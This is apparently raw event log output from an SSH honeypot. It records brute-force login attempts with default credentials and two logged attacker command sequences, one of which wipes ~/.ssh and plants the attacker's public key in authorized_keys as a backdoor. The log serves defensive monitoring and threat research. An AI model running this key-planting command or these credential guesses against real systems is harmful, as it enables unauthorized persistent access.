{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:19:42.857091Z","src_ip":"212.227.235.229","session":"c5c4670a15c9"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":60844,"dst_ip":"1.2.3.4","dst_port":22,"session":"507613650ed0","protocol":"ssh","message":"New connection: 217.154.1.158:60844 (1.2.3.4:22) [session: 507613650ed0]","sensor":"my-vps","timestamp":"2025-08-26T19:19:43.709079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:19:43.712256Z","src_ip":"217.154.1.158","session":"507613650ed0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:19:43.724329Z","src_ip":"217.154.1.158","session":"507613650ed0"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-26T19:19:43.809330Z","src_ip":"217.154.1.158","session":"507613650ed0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:19:43.921762Z","src_ip":"212.227.235.229","session":"c5c4670a15c9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:44.825767Z","src_ip":"217.154.1.158","session":"507613650ed0"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:45.188482Z","src_ip":"212.227.235.229","session":"c5c4670a15c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45158,"dst_ip":"1.2.3.4","dst_port":22,"session":"75515e422a0d","protocol":"ssh","message":"New connection: 212.227.235.229:45158 (1.2.3.4:22) [session: 75515e422a0d]","sensor":"my-vps","timestamp":"2025-08-26T19:19:45.432893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:19:45.436084Z","src_ip":"212.227.235.229","session":"75515e422a0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:19:45.692288Z","src_ip":"212.227.235.229","session":"75515e422a0d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:19:46.701235Z","src_ip":"212.227.235.229","session":"75515e422a0d"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:46.951355Z","src_ip":"212.227.235.229","session":"33242251f775"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:19:46.954592Z","src_ip":"212.227.235.229","session":"75515e422a0d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59034,"dst_ip":"1.2.3.4","dst_port":22,"session":"9423a28fdc61","protocol":"ssh","message":"New connection: 217.154.1.158:59034 (1.2.3.4:22) [session: 9423a28fdc61]","sensor":"my-vps","timestamp":"2025-08-26T19:20:01.312579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:20:01.313687Z","src_ip":"217.154.1.158","session":"9423a28fdc61"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:20:01.327589Z","src_ip":"217.154.1.158","session":"9423a28fdc61"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-26T19:20:01.372166Z","src_ip":"217.154.1.158","session":"9423a28fdc61"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:02.398894Z","src_ip":"217.154.1.158","session":"9423a28fdc61"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35500,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9de60e17355","protocol":"ssh","message":"New connection: 217.154.1.158:35500 (1.2.3.4:22) [session: a9de60e17355]","sensor":"my-vps","timestamp":"2025-08-26T19:20:18.922776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:20:18.923671Z","src_ip":"217.154.1.158","session":"a9de60e17355"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:20:18.938589Z","src_ip":"217.154.1.158","session":"a9de60e17355"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-26T19:20:18.981451Z","src_ip":"217.154.1.158","session":"a9de60e17355"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:19.997250Z","src_ip":"217.154.1.158","session":"a9de60e17355"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":40544,"dst_ip":"1.2.3.4","dst_port":22,"session":"015188b2c963","protocol":"ssh","message":"New connection: 217.154.1.158:40544 (1.2.3.4:22) [session: 015188b2c963]","sensor":"my-vps","timestamp":"2025-08-26T19:20:36.362422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:20:36.363602Z","src_ip":"217.154.1.158","session":"015188b2c963"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:20:36.378636Z","src_ip":"217.154.1.158","session":"015188b2c963"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:20:36.424409Z","src_ip":"217.154.1.158","session":"015188b2c963"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:37.440860Z","src_ip":"217.154.1.158","session":"015188b2c963"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56479,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d50677233a9","protocol":"ssh","message":"New connection: 212.227.235.229:56479 (1.2.3.4:22) [session: 5d50677233a9]","sensor":"my-vps","timestamp":"2025-08-26T19:20:49.607116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:20:49.608799Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:20:49.860127Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.login.success","username":"root","password":"Ww123456.","message":"login attempt [root/Ww123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:20:50.851588Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:20:51.368984Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:20:51.369681Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:20:51.370831Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:51.618144Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:20:52.221942Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:20:52.222790Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:20:52.475268Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:20:52.476363Z","src_ip":"212.227.235.229","session":"5d50677233a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57112,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa3d18b62134","protocol":"ssh","message":"New connection: 212.227.235.229:57112 (1.2.3.4:22) [session: aa3d18b62134]","sensor":"my-vps","timestamp":"2025-08-26T19:20:52.724816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:20:52.729929Z","src_ip":"212.227.235.229","session":"aa3d18b62134"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:20:52.978776Z","src_ip":"212.227.235.229","session":"aa3d18b62134"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":32892,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a18506518a0","protocol":"ssh","message":"New connection: 217.154.1.158:32892 (1.2.3.4:22) [session: 6a18506518a0]","sensor":"my-vps","timestamp":"2025-08-26T19:20:53.738945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:20:53.739587Z","src_ip":"217.154.1.158","session":"6a18506518a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:20:53.756167Z","src_ip":"217.154.1.158","session":"6a18506518a0"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T19:20:53.800437Z","src_ip":"217.154.1.158","session":"6a18506518a0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:20:53.975174Z","src_ip":"212.227.235.229","session":"aa3d18b62134"}
